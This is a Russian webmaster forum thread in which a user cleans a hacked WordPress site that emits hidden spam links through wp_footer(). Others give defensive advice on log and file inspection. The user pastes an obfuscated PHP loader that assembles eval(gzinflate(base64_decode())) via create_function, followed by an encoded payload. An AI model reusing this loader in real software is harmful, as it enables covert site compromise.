- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Пароль сменил только что
Но сегодня с утра ничего нет (вчера почистил)
Пароль сменил только что
Но сегодня с утра ничего нет (вчера почистил)
После удаления вредоносного кода проверяйте сайт каждые 2-3 дня.
Если опять появится - смените хостинг.
Проверьте остальные сайты на этом же хостинге.
После удаления вредоносного кода проверяйте сайт каждые 2-3 дня.
Если опять появится - смените хостинг.
Проверьте остальные сайты на этом же хостинге.
скрытые ссылки выводит wp_footer() в футере
его удалил - ничего не выводится
но вот сам код вывода кода и место подменны wp_footer() не могу найти
что примерно писали?
---------- Добавлено 16.02.2013 в 03:49 ----------
именно wp_footer(); выводит скрытые ссылки
где найти код функции wp_footer();
смотрел в functions.php темы и движка - ничего подозрительного
смотрел general-template.php тоже ничего
где еще смотреть?
Поищите файлы и каталоги с очень свежей датой, сейчас софт пошел примитивный дату обычно не меняет.
Проверьте все, что нашли. Возможно вам повезет и среди этих файликов будет список того, что вам залили.
Потом открывайте лог и смотрите все запросы POST, возле этой даты.
Если увидите что-то чего не должно быть по логике, возможно это и есть запрос, который покажет вашу уязвимость.
Да, не сказал, запросы ищите в логе доступа.
$md5 = "1f81a6816f2dfbd7e2cc5a80f8ff4f00";
$ae = array("(",'$',"f",'d','a','b',"v",'n','e','s',';','c',"6",'l','4','z',"r",'i','g',")","_","o",'t');
$bef = create_function('$'.'v',$ae[8].$ae[6].$ae[4].$ae[13].$ae[0].$ae[18].$ae[15].$ae[17].$ae[7].$ae[2].$ae[13].$ae[4].$ae[22].$ae[8].$ae[0].$ae[5].$ae[4].$ae[9].$ae[8].$ae[12].$ae[14].$ae[20].$ae[3].$ae[8].$ae[11].$ae[21].$ae[3].$ae[8].$ae[0].$ae[1].$ae[6].$ae[19].$ae[19].$ae[19].$ae[10]);
$bef('DZRFDu0GAsCO01ZZhElVF8EXZt6Mwsyc088/gSVLdnmlw9/1107VkB7l31m6lwT2v6LM56L8+y8x8eF99+W6di2dhhobep9h6eDHdPRWGZKFpkD2bad5U9/L0JoJXLYFWeQOVCvNgDXmOi6/TD6/Ij/pwx3sh6JimiBbBX0o3mhd75TP6hA5FViBZ8pKv94xpSJpl0vdVlZ+49Sppv1o91Cc3Or824kVNcTU/lRpNdM2b8PmZZ4L1uMMbj2gqEf2zoEbfaVbrgUUMyKuNt507U0EZuXzM/9/VegMniq4PTNQ8ny+mw5+i1bu8USRdnxCx7vTS1ebaYCLNzflylwGpl8hZqCaCiv6d6dcwtMl7Lre3xRdhgy11tozf757ZVD89JAh50ku+HHc7WORSjxWie8gWDbTqbpe3LUhlZMXSrrKEoTxlCY0SzSZ7nnL/0B2zX6LrhUWWXfaNeaQiAm0NIQmzeqqqme4vcYuCtOKgoK6EwovIcy4UhFcjsaQMuilnB0iIWuOwL+qXoEg7yyDvb+xnuajfebDP8eCrD3rGS03SzTTtCu8DqmylYIKBxc9YBar2iO4BBr2X61SIdSwOMlVKaRJLykD27z/nKWszhbrPY3Dnq6iKH8TkgfXhAwDduuiN5qSStQzT8ZQImOfvUNckppgT+PiUOdxQ4MAPpBvXIPI0i+tO5fm3Yh0MpzsAEwJDVb/16ibrv35ipcWVGwHCnQOE7NDLMmbNJti9DT+/BIUDeMLa4IOL1fPsb4QkhvM83SezkMkGApGyY9/Rqvd7HtUzz5xoozfwPL3zUKBkVXAcx3TdDLvv2nTeCVIjAmzII8numt+sW2mheX1OMrakUuwy7n82M4DfnT8IgcWFHQ2b4iam9TheVm+4QpsA2hiSfxlOu6HtjPXTZeWM0OB4079rau0o7OJE6bJGCYgzf5WYnHBxkDw7LvZPw3ZC09/ihMc63DW6EIpimaL48pEyYgqShCoVXbQEGxfKsuxWveUOXAsY1lU4Hy5ZGLzpyiglfDpYaIXDYbptQPWmjTRqFXoweZeaDJWmFH80QEfhMQl5rrC3iDrAK/oK03b+GTYWfYM8qvy56wicZeAand
?>
Вроде нашол
---------- Добавлено 17.02.2013 в 00:30 ----------
вобщем по поиску по create_function('$' нашол много интересного
---------- Добавлено 17.02.2013 в 01:27 ----------
удалил
но проблема осталась
уже и не знаю что делать